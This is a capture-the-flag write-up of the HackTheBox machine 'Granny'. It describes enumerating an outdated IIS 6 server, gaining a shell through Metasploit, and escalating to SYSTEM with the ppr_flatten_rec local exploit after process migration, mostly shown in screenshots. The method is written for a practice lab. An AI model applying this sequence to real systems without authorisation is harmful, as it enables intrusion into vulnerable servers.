Granny Writeup

Sep 19, 2018 • ctf,boot2root,hackthebox

Granny Writeup | HackTheBox

Screenshot

i. Port Scan

Screenshot

ii. Enumeration

Navigating to port 80:

Screenshot

Presented with an Under Construction page.

Running Nikto to enumerate the websoftware:

Screenshot

IIS 6 was shipped out with Windows 2003 R2 in 2005, which means it’s over 13 years old.

With software being that old, there’s bound to be an exploit out there.

Screenshot

Running the exploit in Metasploit:

Screenshot

Awesome, we got a shell!

iii. Privilege Escalation

We see that we are NT Authority\Network Service:

Screenshot

Network Service is a built-in account with reduced privileges.

https://serverfault.com/questions/217654/difference-between-nt-authority-network-service-and-nt-authority-system

Metasploit has a local exploit suggester module which displays exploits that the machine might be vulnerable to:

Screenshot

Going to attempt the last one, ppr_flatten_rec

To do so, first need to background the session. Then setup the options for the exploit:

Screenshot

$ background # backgrounds session
$ sessions  # shows available sessions
$ set SESSION #

Once the options are setup, run the exploit:

Screenshot

RequestError stdapi_sys_config_getsid

Strange error…

The error can be fixed by migrating the process.

First switch back to the session, and run ps to see available processes:

Screenshot

The migrate to another process.

Note: the process must have same or lesser privileges. If not, you'll get an error when migrating

Screenshot

Re-run the exploit as before:

Screenshot

Looking at the UID, we are now SYSTEM

iv. Conclusion

This is a great beginner box into the world of Metasploit.

Thanks for reading.

Sources / Links:
[0]: https://serverfault.com/questions/217654/difference-between-nt-authority-network-service-and-nt-authority-system